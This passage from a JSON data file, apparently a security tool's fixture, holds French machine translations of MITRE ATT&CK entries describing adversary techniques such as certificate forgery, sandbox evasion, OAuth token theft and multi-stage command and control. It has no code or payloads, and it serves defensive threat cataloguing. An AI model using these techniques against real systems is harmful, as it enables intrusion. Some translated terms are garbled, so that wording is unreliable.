vol\u00e9s et falsifi\u00e9s pour les comptes d\u2019ordinateur. Les adversaires qui ont acc\u00e8s aux cl\u00e9s priv\u00e9es de certificat d\u2019autorit\u00e9 de certification racine (ou subordonn\u00e9e) (ou aux m\u00e9canismes de protection/gestion de ces cl\u00e9s) peuvent \u00e9galement \u00e9tablir [Persistence](https://attack.mitre.org/tactics/TA0003) en falsifiant des certificats d\u2019authentification arbitraires pour le domaine victime (appel\u00e9s certificats '\u00c4\u00fagolden\u2019\u00c4\u00f9). (Citation : Medium Certified Pre Owned) Les adversaires peuvent \u00e9galement cibler des certificats et des services connexes afin d\u2019acc\u00e9der \u00e0 d\u2019autres formes d\u2019informations d\u2019identification, telles que les tickets d\u2019octroi de tickets (TGT) [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ou le texte en clair NTLM. (Citation : Medium Certified Pre Owned)\nhttps://attack.mitre.org/techniques/T1649\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1049 - D\u00e9couverte des connexions r\u00e9seau syst\u00e8me", - "description": "Les adversaires peuvent tenter d\u2019obtenir une liste des connexions r\u00e9seau vers ou depuis le syst\u00e8me compromis auquel ils acc\u00e8dent actuellement ou \u00e0 partir de syst\u00e8mes distants en interrogeant des informations sur le r\u00e9seau. Un adversaire qui acc\u00e8de \u00e0 un syst\u00e8me faisant partie d\u2019un environnement bas\u00e9 sur le cloud peut cartographier des clouds priv\u00e9s virtuels ou des r\u00e9seaux virtuels afin de d\u00e9terminer quels syst\u00e8mes et services sont connect\u00e9s. Les actions effectu\u00e9es sont probablement les m\u00eames types de techniques de d\u00e9couverte selon le syst\u00e8me d\u2019exploitation, mais les informations r\u00e9sultantes peuvent inclure des d\u00e9tails sur l\u2019environnement cloud en r\u00e9seau pertinents pour les objectifs de l\u2019adversaire. Les fournisseurs de cloud peuvent avoir diff\u00e9rentes fa\u00e7ons dont leurs r\u00e9seaux virtuels fonctionnent. (R\u00e9f\u00e9rence : Amazon AWS VPC Guide) (Citation : Microsoft Azure Virtual Network Overview) (Citation : Pr\u00e9sentation de Google VPC) De m\u00eame, les adversaires qui acc\u00e8dent aux p\u00e9riph\u00e9riques r\u00e9seau peuvent \u00e9galement effectuer des activit\u00e9s de d\u00e9couverte similaires pour recueillir des informations sur les syst\u00e8mes et services connect\u00e9s. Les utilitaires et les commandes qui acqui\u00e8rent ces informations incluent [netstat](https://attack.mitre.org/software/S0104), \u00ab\u00a0net use\u00a0\u00bb et \u00ab\u00a0net session\u00a0\u00bb avec [Net](https://attack.mitre.org/software/S0039). Sous Mac et Linux, [netstat](https://attack.mitre.org/software/S0104) et lsof peuvent \u00eatre utilis\u00e9s pour r\u00e9pertorier les connexions actuelles. who -a et w peuvent \u00eatre utilis\u00e9s pour montrer quels utilisateurs sont actuellement connect\u00e9s, similaire \u00e0 \u00ab\u00a0net session\u00a0\u00bb. En outre, des fonctionnalit\u00e9s int\u00e9gr\u00e9es natives aux p\u00e9riph\u00e9riques r\u00e9seau et \u00e0 [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) peuvent \u00eatre utilis\u00e9es (par exemple, show ip sockets, show tcp brief). (R\u00e9f\u00e9rence : US-CERT-TA18-106A)\nhttps://attack.mitre.org/techniques/T1049\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1584 - Compromission d\u2019infrastructure", - "description": "Les adversaires peuvent compromettre l\u2019infrastructure tierce qui peut \u00eatre utilis\u00e9e lors du ciblage. Les solutions d\u2019infrastructure comprennent des serveurs physiques ou cloud, des domaines et des services Web et DNS tiers. Au lieu d\u2019acheter, de louer ou de louer une infrastructure, un adversaire peut compromettre l\u2019infrastructure et l\u2019utiliser pendant d\u2019autres phases de son cycle de vie. (Citation : Mandiant APT1) (Citation : ICANNDomainNameHijacking) (Citation: Talos DNSpionage Nov 2018) (Citation : FireEye EPS Awakens Part 2) De plus, les adversaires peuvent compromettre de nombreuses machines pour former un botnet qu\u2019ils peuvent exploiter. L\u2019utilisation d\u2019une infrastructure compromise permet aux adversaires d\u2019organiser, de lancer et d\u2019ex\u00e9cuter des op\u00e9rations. Une infrastructure compromise peut aider les op\u00e9rations adverses \u00e0 se fondre dans le trafic consid\u00e9r\u00e9 comme normal, comme le contact avec des sites de haute r\u00e9putation ou de confiance. Par exemple, les adversaires peuvent tirer parti d\u2019une infrastructure compromise (potentiellement \u00e9galement en conjonction avec [Certificats num\u00e9riques](https://attack.mitre.org/techniques/T1588/004)) pour int\u00e9grer et soutenir davantage la collecte d\u2019informations par \u00e9tapes et/ou les campagnes [de phishing](https://attack.mitre.org/techniques/T1566). (Citation : FireEye DNS Hijack 2019) En outre, les adversaires peuvent \u00e9galement compromettre l\u2019infrastructure pour soutenir [Proxy](https://attack.mitre.org/techniques/T1090). (R\u00e9f\u00e9rence : amnesty_nso_pegasus) En utilisant une infrastructure compromise, les adversaires peuvent rendre difficile le lien entre leurs actions et eux. Avant le ciblage, les adversaires peuvent compromettre l\u2019infrastructure d\u2019autres adversaires. (Citation: NSA NCSC Turla OilRig)\nhttps://attack.mitre.org/techniques/T1584\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1542 - D\u00e9marrage pr\u00e9-syst\u00e8me d\u2019exploitation", - "description": "Les adversaires peuvent abuser des m\u00e9canismes de d\u00e9marrage pr\u00e9-OS pour \u00e9tablir la persistance sur un syst\u00e8me. Pendant le processus de d\u00e9marrage d\u2019un ordinateur, le microprogramme et divers services de d\u00e9marrage sont charg\u00e9s avant le syst\u00e8me d\u2019exploitation. Ces programmes contr\u00f4lent le flux d\u2019ex\u00e9cution avant que le syst\u00e8me d\u2019exploitation ne prenne le contr\u00f4le. (Citation: Wikipedia Booting) Les adversaires peuvent \u00e9craser les donn\u00e9es dans les pilotes de d\u00e9marrage ou les microprogrammes tels que le BIOS (Basic Input/Output System) et l\u2019interface UEFI (Unified Extensible Firmware Interface) pour persister sur les syst\u00e8mes situ\u00e9s \u00e0 une couche inf\u00e9rieure au syst\u00e8me d\u2019exploitation. Cela peut \u00eatre particuli\u00e8rement difficile \u00e0 d\u00e9tecter car les logiciels malveillants \u00e0 ce niveau ne seront pas d\u00e9tect\u00e9s par les d\u00e9fenses bas\u00e9es sur le logiciel h\u00f4te.\nhttps://attack.mitre.org/techniques/T1542\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1612 - Cr\u00e9er une image sur l\u2019h\u00f4te", - "description": "Les adversaires peuvent cr\u00e9er une image de conteneur directement sur un h\u00f4te pour contourner les d\u00e9fenses qui surveillent la r\u00e9cup\u00e9ration d\u2019images malveillantes \u00e0 partir d\u2019un registre public. Une demande build distante peut \u00eatre envoy\u00e9e \u00e0 l\u2019API Docker qui inclut un Dockerfile qui extrait une image de base vanille, telle que alpine, \u00e0 partir d\u2019un registre public ou local, puis cr\u00e9e une image personnalis\u00e9e dessus. (Citation : Image de construction Docker) Un adversaire peut tirer parti de cette API build pour cr\u00e9er une image personnalis\u00e9e sur l\u2019h\u00f4te qui inclut des logiciels malveillants t\u00e9l\u00e9charg\u00e9s \u00e0 partir de son serveur C2, puis il peut utiliser [D\u00e9ployer le conteneur](https://attack.mitre.org/techniques/T1610) en utilisant cette image personnalis\u00e9e. (Citation: Aqua Build Images sur les h\u00f4tes) (Citation : Rapport sur les menaces natives d\u2019Aqua Security Cloud, juin 2021) Si l\u2019image de base est extraite d\u2019un registre public, les d\u00e9fenses ne d\u00e9tecteront probablement pas l\u2019image comme malveillante car il s\u2019agit d\u2019une image vanille. Si l\u2019image de base r\u00e9side d\u00e9j\u00e0 dans un registre local, l\u2019extraction peut \u00eatre consid\u00e9r\u00e9e comme encore moins suspecte puisque l\u2019image est d\u00e9j\u00e0 dans l\u2019environnement.\nhttps://attack.mitre.org/techniques/T1612\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1586 - Comptes de compromission", - "description": "Les adversaires peuvent compromettre les comptes avec des services qui peuvent \u00eatre utilis\u00e9s lors du ciblage. Pour les op\u00e9rations int\u00e9grant l\u2019ing\u00e9nierie sociale, l\u2019utilisation d\u2019un personnage en ligne peut \u00eatre importante. Plut\u00f4t que de cr\u00e9er et de cultiver des comptes (c.-\u00e0-d. [\u00c9tablir des comptes](https://attack.mitre.org/techniques/T1585)), les adversaires peuvent compromettre les comptes existants. L\u2019utilisation d\u2019un personnage existant peut engendrer un niveau de confiance dans une victime potentielle si elle a une relation ou une connaissance du personnage compromis. Il existe diverses m\u00e9thodes pour compromettre les comptes, telles que la collecte d\u2019informations d\u2019identification via [Hame\u00e7onnage pour information](https://attack.mitre.org/techniques/T1598), l\u2019achat d\u2019informations d\u2019identification aupr\u00e8s de sites tiers, le for\u00e7age brutal des informations d\u2019identification (par exemple, la r\u00e9utilisation de mots de passe \u00e0 partir de vidages d\u2019informations d\u2019identification de violation) ou le paiement d\u2019employ\u00e9s, de fournisseurs ou de partenaires commerciaux pour acc\u00e9der aux informations d\u2019identification. (Citation : AnonHBGary) (R\u00e9f\u00e9rence : Microsoft DEV-0537) Avant de compromettre les comptes, les adversaires peuvent effectuer une reconnaissance pour \u00e9clairer les d\u00e9cisions sur les comptes \u00e0 compromettre pour poursuivre leurs op\u00e9rations. Les personas peuvent exister sur un seul site ou sur plusieurs sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Les comptes compromis peuvent n\u00e9cessiter un d\u00e9veloppement suppl\u00e9mentaire, cela peut inclure le remplissage ou la modification des informations de profil, le d\u00e9veloppement des r\u00e9seaux sociaux ou l\u2019int\u00e9gration de photos. Les adversaires peuvent exploiter directement des comptes de messagerie compromis pour [Hame\u00e7onnage \u00e0 des fins d\u2019information](https://attack.mitre.org/techniques/T1598) ou [Hame\u00e7onnage](https://attack.mitre.org/techniques/T1566).\nhttps://attack.mitre.org/techniques/T1586\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1497 - Virtualisation/\u00c9vasion Sandbox", - "description": "Les adversaires peuvent utiliser divers moyens pour d\u00e9tecter et \u00e9viter les environnements de virtualisation et d\u2019analyse. Cela peut inclure la modification des comportements en fonction des r\u00e9sultats des v\u00e9rifications de la pr\u00e9sence d\u2019artefacts indiquant un environnement de machine virtuelle (VME) ou un bac \u00e0 sable. Si l\u2019adversaire d\u00e9tecte une VME, il peut modifier son logiciel malveillant pour se d\u00e9sengager de la victime ou dissimuler les fonctions essentielles de l\u2019implant. Ils peuvent \u00e9galement rechercher des artefacts VME avant de d\u00e9poser des charges utiles secondaires ou suppl\u00e9mentaires. Les adversaires peuvent utiliser les informations apprises de [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) lors de la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi. (Citation : Deloitte Environmental Awareness) Les adversaires peuvent utiliser plusieurs m\u00e9thodes pour accomplir [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), telles que la v\u00e9rification des outils de surveillance de la s\u00e9curit\u00e9 (par exemple, Sysinternals, Wireshark, etc.) ou d\u2019autres artefacts syst\u00e8me associ\u00e9s \u00e0 l\u2019analyse ou \u00e0 la virtualisation. Les adversaires peuvent \u00e9galement v\u00e9rifier l\u2019activit\u00e9 l\u00e9gitime des utilisateurs pour d\u00e9terminer si elle se trouve dans un environnement d\u2019analyse. D\u2019autres m\u00e9thodes incluent l\u2019utilisation de minuteries de sommeil ou de boucles dans le code malveillant pour \u00e9viter de fonctionner dans un bac \u00e0 sable temporaire. (R\u00e9f\u00e9rence : Unit\u00e9 42 Pirpi juillet 2015)\nhttps://attack.mitre.org/techniques/T1497\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1102 - Service web", - "description": "Les adversaires peuvent utiliser un service Web externe l\u00e9gitime existant comme moyen de relayer des donn\u00e9es vers/depuis un syst\u00e8me compromis. Les sites Web populaires et les m\u00e9dias sociaux agissant comme un m\u00e9canisme pour C2 peuvent fournir une couverture importante en raison de la probabilit\u00e9 que les h\u00f4tes au sein d\u2019un r\u00e9seau communiquent d\u00e9j\u00e0 avec eux avant une compromission. L\u2019utilisation de services communs, tels que ceux offerts par Google ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. Les fournisseurs de services Web utilisent g\u00e9n\u00e9ralement le chiffrement SSL/TLS, offrant aux adversaires un niveau de protection suppl\u00e9mentaire. L\u2019utilisation de services Web peut \u00e9galement prot\u00e9ger l\u2019infrastructure C2 back-end contre la d\u00e9couverte par l\u2019analyse binaire des logiciels malveillants tout en permettant la r\u00e9silience op\u00e9rationnelle (car cette infrastructure peut \u00eatre modifi\u00e9e dynamiquement).\nhttps://attack.mitre.org/techniques/T1102\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1608 - Capacit\u00e9s de simulation", - "description": "Les adversaires peuvent t\u00e9l\u00e9charger, installer ou configurer des fonctionnalit\u00e9s qui peuvent \u00eatre utilis\u00e9es pendant le ciblage. Pour soutenir ses op\u00e9rations, un adversaire peut avoir besoin de prendre des capacit\u00e9s qu\u2019il a d\u00e9velopp\u00e9es ([D\u00e9velopper des capacit\u00e9s](https://attack.mitre.org/techniques/T1587)) ou obtenues ([Obtenir des capacit\u00e9s](https://attack.mitre.org/techniques/T1588)) et de les mettre en sc\u00e8ne sur une infrastructure sous son contr\u00f4le. Ces capacit\u00e9s peuvent \u00eatre mises en place sur une infrastructure qui a d\u00e9j\u00e0 \u00e9t\u00e9 achet\u00e9e/lou\u00e9e par l\u2019adversaire ([Acqu\u00e9rir l\u2019infrastructure](https://attack.mitre.org/techniques/T1583)) ou qui a \u00e9t\u00e9 autrement compromise par lui ([Infrastructure compromise](https://attack.mitre.org/techniques/T1584)). Les fonctionnalit\u00e9s peuvent \u00e9galement \u00eatre mises en place sur des services Web, tels que GitHub ou Pastebin, ou sur des offres PaaS (Platform-as-a-Service) qui permettent aux utilisateurs de provisionner facilement des applications. (Citation: Volexity Ocean Lotus novembre 2020) (Citation : Dragos Heroku Watering Hole) (Citation : Malwarebytes Heroku Skimmers) (R\u00e9f\u00e9rence : Redirection Netskope GCP) (Citation : Netskope Cloud Phishing) La mise en sc\u00e8ne des fonctionnalit\u00e9s peut aider l\u2019adversaire dans un certain nombre de comportements d\u2019acc\u00e8s initial et de post-compromission, y compris (mais sans s\u2019y limiter) :* Mise en sc\u00e8ne des ressources Web n\u00e9cessaires pour effectuer [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) lorsqu\u2019un utilisateur navigue sur un site. (Citation : FireEye CFR Watering Hole 2012) (R\u00e9f\u00e9rence : Gallagher 2015) (Citation : ATT ScanBox)* Ressources Web de mise en sc\u00e8ne pour une cible de lien \u00e0 utiliser avec le spearphishing. (Citation : Malwarebytes Silent Librarian octobre 2020) (R\u00e9f\u00e9rence : Proofpoint TA407 septembre 2019)* T\u00e9l\u00e9chargement de logiciels malveillants ou d\u2019outils vers un emplacement accessible \u00e0 un r\u00e9seau de victimes pour permettre [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105). (Citation : Volexity Ocean Lotus novembre 2020)* Installation d\u2019un certificat SSL/TLS pr\u00e9c\u00e9demment acquis \u00e0 utiliser pour chiffrer le trafic de commande et de contr\u00f4le (ex: [Cryptographie asym\u00e9trique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)). (Citation : DigiCert Install SSL Cert)\nhttps://attack.mitre.org/techniques/T1608\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1104 - Canaux \u00e0 plusieurs \u00e9tages", - "description": "Les adversaires peuvent cr\u00e9er plusieurs \u00e9tapes pour le commandement et le contr\u00f4le qui sont utilis\u00e9es dans diff\u00e9rentes conditions ou pour certaines fonctions. L\u2019utilisation de plusieurs \u00e9tapes peut obscurcir le canal de commande et de contr\u00f4le pour rendre la d\u00e9tection plus difficile. Les outils d\u2019acc\u00e8s \u00e0 distance rappelleront le serveur de commande et de contr\u00f4le de la premi\u00e8re \u00e9tape pour obtenir des instructions. La premi\u00e8re \u00e9tape peut avoir des capacit\u00e9s automatis\u00e9es pour collecter des informations de base sur l\u2019h\u00f4te, mettre \u00e0 jour les outils et t\u00e9l\u00e9charger des fichiers suppl\u00e9mentaires. Un deuxi\u00e8me outil d\u2019acc\u00e8s \u00e0 distance (RAT) pourrait \u00eatre t\u00e9l\u00e9charg\u00e9 \u00e0 ce moment-l\u00e0 pour rediriger l\u2019h\u00f4te vers le serveur de commande et de contr\u00f4le secondaire. La deuxi\u00e8me \u00e9tape sera probablement plus compl\u00e8te et permettra \u00e0 l\u2019adversaire d\u2019interagir avec le syst\u00e8me gr\u00e2ce \u00e0 une coque invers\u00e9e et \u00e0 des fonctionnalit\u00e9s RAT suppl\u00e9mentaires. Les diff\u00e9rentes \u00e9tapes seront probablement h\u00e9berg\u00e9es s\u00e9par\u00e9ment sans chevauchement d\u2019infrastructure. Le chargeur peut \u00e9galement avoir des rappels de sauvegarde de premi\u00e8re \u00e9tape ou [canaux de secours](https://attack.mitre.org/techniques/T1008) au cas o\u00f9 le chemin de communication d\u2019origine de la premi\u00e8re \u00e9tape serait d\u00e9couvert et bloqu\u00e9.\nhttps://attack.mitre.org/techniques/T1104\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1480 - Garde-fous d\u2019ex\u00e9cution", - "description": "Les adversaires peuvent utiliser des garde-fous d\u2019ex\u00e9cution pour limiter l\u2019ex\u00e9cution ou les actions en fonction des conditions sp\u00e9cifiques fournies par l\u2019adversaire et de l\u2019environnement qui devraient \u00eatre pr\u00e9sentes sur la cible. Les garde-fous garantissent qu\u2019une charge utile ne s\u2019ex\u00e9cute que contre une cible pr\u00e9vue et r\u00e9duisent les dommages collat\u00e9raux caus\u00e9s par la campagne d\u2019un adversaire. (Citation : FireEye Kevin Mandia Garde-corps) Les valeurs qu\u2019un adversaire peut fournir sur un syst\u00e8me ou un environnement cible \u00e0 utiliser comme garde-fous peuvent inclure des noms de partage r\u00e9seau sp\u00e9cifiques, des p\u00e9riph\u00e9riques physiques connect\u00e9s, des fichiers, des domaines Active Directory (AD) joints et des adresses IP locales/externes. (Citation: FireEye Outlook d\u00e9cembre 2019) Les garde-corps peuvent \u00eatre utilis\u00e9s pour emp\u00eacher l\u2019exposition des capacit\u00e9s dans des environnements qui ne sont pas destin\u00e9s \u00e0 \u00eatre compromis ou utilis\u00e9s dans. Cette utilisation de garde-corps est distincte de la [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) typique. Bien que l\u2019utilisation de [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) puisse impliquer la v\u00e9rification des valeurs connues du bac \u00e0 sable et la poursuite de l\u2019ex\u00e9cution uniquement en l\u2019absence de correspondance, l\u2019utilisation de garde-fous impliquera la v\u00e9rification d\u2019une valeur sp\u00e9cifique \u00e0 la cible attendue et la poursuite de l\u2019ex\u00e9cution uniquement s\u2019il existe une telle correspondance.\nhttps://attack.mitre.org/techniques/T1480\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1619 - D\u00e9couverte d\u2019objets de stockage cloud", - "description": "Les adversaires peuvent \u00e9num\u00e9rer des objets dans l\u2019infrastructure de stockage cloud. Les adversaires peuvent utiliser ces informations lors de la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris la demande de tous les objets ou de certains objets \u00e0 partir du stockage cloud. Semblable \u00e0 [D\u00e9couverte de fichiers et de r\u00e9pertoires](https://attack.mitre.org/techniques/T1083) sur un h\u00f4te local, apr\u00e8s avoir identifi\u00e9 les services de stockage disponibles (c\u2019est-\u00e0-dire [D\u00e9couverte d\u2019infrastructure cloud](https://attack.mitre.org/techniques/T1580)), les adversaires peuvent acc\u00e9der au contenu/aux objets stock\u00e9s dans l\u2019infrastructure cloud. Les fournisseurs de services cloud proposent des API permettant aux utilisateurs d\u2019\u00e9num\u00e9rer les objets stock\u00e9s dans le stockage cloud. Les exemples incluent ListObjectsV2 dans AWS (Citation : ListObjectsV2) et List Blobs dans Azure (Citation : List Blobs).\nhttps://attack.mitre.org/techniques/T1619\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1528 - Voler le jeton d\u2019acc\u00e8s \u00e0 l\u2019application", - "description": "Les adversaires peuvent voler des jetons d\u2019acc\u00e8s aux applications afin d\u2019acqu\u00e9rir des informations d\u2019identification pour acc\u00e9der \u00e0 des syst\u00e8mes et des ressources distants. Les jetons d\u2019acc\u00e8s aux applications sont utilis\u00e9s pour effectuer des demandes d\u2019API autoris\u00e9es au nom d\u2019un utilisateur ou d\u2019un service et sont couramment utilis\u00e9s pour acc\u00e9der aux ressources dans les applications cloud et bas\u00e9es sur des conteneurs et les logiciels en tant que service (SaaS). (Citation: Auth0 - Pourquoi vous devriez toujours utiliser des jetons d\u2019acc\u00e8s pour s\u00e9curiser les API septembre 2019) OAuth est une infrastructure couramment impl\u00e9ment\u00e9e qui \u00e9met des jetons aux utilisateurs pour l\u2019acc\u00e8s aux syst\u00e8mes. Les adversaires qui volent des jetons d\u2019API de compte dans des environnements cloud et conteneuris\u00e9s peuvent \u00eatre en mesure d\u2019acc\u00e9der aux donn\u00e9es et d\u2019effectuer des actions avec les autorisations de ces comptes, ce qui peut entra\u00eener une escalade des privil\u00e8ges et une compromission suppl\u00e9mentaire de l\u2019environnement. Dans les environnements Kubernetes, les processus ex\u00e9cut\u00e9s \u00e0 l\u2019int\u00e9rieur d\u2019un conteneur communiquent avec le serveur d\u2019API Kubernetes \u00e0 l\u2019aide de jetons de compte de service. Si un conteneur est compromis, un attaquant peut \u00eatre en mesure de voler le jeton du conteneur et ainsi acc\u00e9der aux commandes de l\u2019API Kubernetes. (R\u00e9f\u00e9rence : Comptes de service Kubernetes) Le vol de jetons peut \u00e9galement se produire par ing\u00e9nierie sociale, auquel cas une action de l\u2019utilisateur peut \u00eatre n\u00e9cessaire pour accorder l\u2019acc\u00e8s. Une application souhaitant acc\u00e9der \u00e0 des services bas\u00e9s sur le cloud ou \u00e0 des API prot\u00e9g\u00e9es peut acc\u00e9der \u00e0 OAuth 2.0 via divers protocoles d\u2019autorisation. Un exemple de s\u00e9quence couramment utilis\u00e9e est le flux d\u2019octroi de code d\u2019autorisation de Microsoft. (Citation : Microsoft Identity Platform Protocols, mai 2019) (R\u00e9f\u00e9rence : Microsoft - OAuth Code Authorization flow - Juin 2019) Un jeton d\u2019acc\u00e8s OAuth permet \u00e0 une application tierce d\u2019interagir avec des ressources contenant des donn\u00e9es utilisateur de la mani\u00e8re demand\u00e9e par l\u2019application sans obtenir d\u2019informations d\u2019identification utilisateur. Les adversaires peuvent tirer parti de l\u2019autorisation OAuth en construisant une application malveillante con\u00e7ue pour acc\u00e9der aux ressources avec le jeton OAuth de l\u2019utilisateur cible. (Citation : Amnesty OAuth Phishing Attacks, ao\u00fbt 2019) (Citation : Trend Micro Pawn Storm OAuth 2017) L\u2019adversaire devra terminer l\u2019inscription de son application aupr\u00e8s du serveur d\u2019autorisation, par exemple Microsoft Identity Platform \u00e0 l\u2019aide du portail Azure, de l\u2019IDE Visual Studio, de l\u2019interface de ligne de commande, de PowerShell ou des appels d\u2019API REST. (Citation : Microsoft - Inscription \u00e0 l\u2019application Azure AD - mai 2019) Ensuite, ils peuvent envoyer un [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) \u00e0 l\u2019utilisateur cible pour l\u2019inciter \u00e0 accorder l\u2019acc\u00e8s \u00e0 l\u2019application. Une fois le jeton d\u2019acc\u00e8s OAuth accord\u00e9, l\u2019application peut obtenir un acc\u00e8s potentiellement \u00e0 long terme aux fonctionnalit\u00e9s du compte d\u2019utilisateur via [Jeton d\u2019acc\u00e8s \u00e0 l\u2019application](https://attack.mitre.org/techniques/T1550/001). (Citation : Microsoft - Jetons d\u2019identit\u00e9 Azure AD - ao\u00fbt 2019) Les jetons d\u2019acc\u00e8s aux applications peuvent fonctionner dans une dur\u00e9e de vie limit\u00e9e, limitant la dur\u00e9e pendant laquelle un adversaire peut utiliser le jeton vol\u00e9. Cependant, dans certains cas, les adversaires peuvent \u00e9galement voler des jetons d\u2019actualisation d\u2019application (Citation: Auth0 Understanding Refresh Tokens), ce qui leur permet d\u2019obtenir de nouveaux jetons d\u2019acc\u00e8s sans demander \u00e0 l\u2019utilisateur.\nhttps://attack.mitre.org/techniques/T1528\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1204 - Ex\u00e9cution par l\u2019utilisateur", - "description": "Un adversaire peut s\u2019appuyer sur des actions sp\u00e9cifiques d\u2019un utilisateur pour obtenir l\u2019ex\u00e9cution. Les utilisateurs peuvent \u00eatre soumis \u00e0 l\u2019ing\u00e9nierie sociale pour les amener \u00e0 ex\u00e9cuter du code malveillant, par exemple en ouvrant un fichier de document ou un lien malveillant. Ces actions de l\u2019utilisateur seront g\u00e9n\u00e9ralement observ\u00e9es comme un comportement de suivi \u00e0 partir de formes de [Phishing](https://attack.mitre.org/techniques/T1566). Bien que [User Execution](https://attack.mitre.org/techniques/T1204) se produise fr\u00e9quemment peu de temps apr\u00e8s l\u2019acc\u00e8s initial, il peut se produire \u00e0 d\u2019autres phases d\u2019une intrusion, par exemple lorsqu\u2019un adversaire place un fichier dans un r\u00e9pertoire partag\u00e9 ou sur le bureau d\u2019un utilisateur en esp\u00e9rant qu\u2019un utilisateur cliquera dessus. Cette activit\u00e9 peut \u00e9galement \u00eatre observ\u00e9e peu de temps apr\u00e8s [Spearphishing interne](https://attack.mitre.org/techniques/T1534). Les adversaires peuvent \u00e9galement tromper les utilisateurs en leur permettant d\u2019effectuer des actions telles que l\u2019activation du [logiciel d\u2019acc\u00e8s \u00e0 distance](https://attack.mitre.org/techniques/T1219), l\u2019autorisation du contr\u00f4le direct du syst\u00e8me \u00e0 l\u2019adversaire ou le t\u00e9l\u00e9chargement et l\u2019ex\u00e9cution de logiciels malveillants pour [l\u2019ex\u00e9cution de l\u2019utilisateur](https://attack.mitre.org/techniques/T1204). Par exemple, les escroqueries au support technique peuvent \u00eatre facilit\u00e9es par [Phishing](https://attack.mitre.org/techniques/T1566), vishing ou diverses formes d\u2019interaction avec l\u2019utilisateur. Les adversaires peuvent utiliser une combinaison de ces m\u00e9thodes, telles que l\u2019usurpation d\u2019identit\u00e9 et la promotion de num\u00e9ros sans frais ou de centres d\u2019appels utilis\u00e9s pour diriger les victimes vers des sites Web malveillants, pour livrer et ex\u00e9cuter des charges utiles contenant des logiciels malveillants ou [Logiciel d\u2019acc\u00e8s \u00e0 distance](https://attack.mitre.org/techniques/T1219). (Citation : Livraison d\u2019attaques t\u00e9l\u00e9phoniques)\nhttps://attack.mitre.org/techniques/T1204\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1057 - D\u00e9couverte de processus", - "description": "Les adversaires peuvent tenter d\u2019obtenir des informations sur les processus en cours d\u2019ex\u00e9cution sur un syst\u00e8me. L\u2019information obtenue pourrait \u00eatre utilis\u00e9e pour mieux comprendre les logiciels/applications courants ex\u00e9cut\u00e9s sur les syst\u00e8mes du r\u00e9seau. Les adversaires peuvent utiliser les informations de [Process Discovery](https://attack.mitre.org/techniques/T1057) pendant la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques. Dans les environnements Windows, les adversaires pouvaient obtenir des d\u00e9tails sur l\u2019ex\u00e9cution des processus \u00e0 l\u2019aide de l\u2019utilitaire [Tasklist](https://attack.mitre.org/software/S0057) via [cmd](https://attack.mitre.org/software/S0106) ou Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Les informations sur les processus peuvent \u00e9galement \u00eatre extraites de la sortie des appels [Native API](https://attack.mitre.org/techniques/T1106) tels que CreateToolhelp32Snapshot. Sous Mac et Linux, cela est accompli avec la commande ps. Les adversaires peuvent \u00e9galement choisir d\u2019\u00e9num\u00e9rer les processus via /proc. Sur les p\u00e9riph\u00e9riques r\u00e9seau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'show processes' peuvent \u00eatre utilis\u00e9es pour afficher les processus en cours d\u2019ex\u00e9cution. (R\u00e9f\u00e9rence : US-CERT-TA18-106A) (R\u00e9f\u00e9rence : show_processes_cisco_cmd)\nhttps://attack.mitre.org/techniques/T1057\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1072 - Outils de d\u00e9ploiement de logiciels", - "description": "Les adversaires peuvent acc\u00e9der et utiliser des suites logicielles tierces install\u00e9es dans un r\u00e9seau d\u2019entreprise, telles que des syst\u00e8mes d\u2019administration, de surveillance et de d\u00e9ploiement, pour se d\u00e9placer lat\u00e9ralement dans le r\u00e9seau. Des applications tierces et des syst\u00e8mes de d\u00e9ploiement de logiciels peuvent \u00eatre utilis\u00e9s dans l\u2019environnement r\u00e9seau \u00e0 des fins d\u2019administration (par exemple, SCCM, HBSS, Altiris, etc.). L\u2019acc\u00e8s \u00e0 un syst\u00e8me logiciel tiers \u00e0 l\u2019\u00e9chelle du r\u00e9seau ou de l\u2019entreprise peut permettre \u00e0 un adversaire d\u2019ex\u00e9cuter du code \u00e0 distance sur tous les syst\u00e8mes connect\u00e9s \u00e0 un tel syst\u00e8me. L\u2019acc\u00e8s peut \u00eatre 